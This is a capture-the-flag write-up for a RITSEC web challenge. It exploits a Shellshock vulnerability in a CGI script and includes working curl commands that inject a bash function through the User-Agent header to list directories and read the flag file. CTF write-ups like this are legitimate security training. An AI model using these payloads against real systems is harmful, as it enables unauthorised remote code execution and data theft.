Skip to content

Latest commit

 

History

History
29 lines (17 loc) · 864 Bytes

WhatACuteDog.md

File metadata and controls

29 lines (17 loc) · 864 Bytes
Raw

Challenge

This dog is shockingly cute!

fun.ritsec.club:8008

Author: sandw1ch

Solve

From the start of the challenge, the hint points us to a vulnerability: Shellshock

There's a vulnerable CGI service running at /cgi-bin/stats

Using the following command, we can obtain RCE:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cd /var/www/;ls -la;'" http://fun.ritsec.club:8008/cgi-bin/stats

After searching through the machine, we find the flag in the /opt/flag.txt file, and we can retireve it with the following command: curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt'" http://fun.ritsec.club:8008/cgi-bin/stats.

The flag is RITSEC{sh3ll_sh0cked_w0wz3rs}

In my opinion, this was the easiest web challenge in this CTF.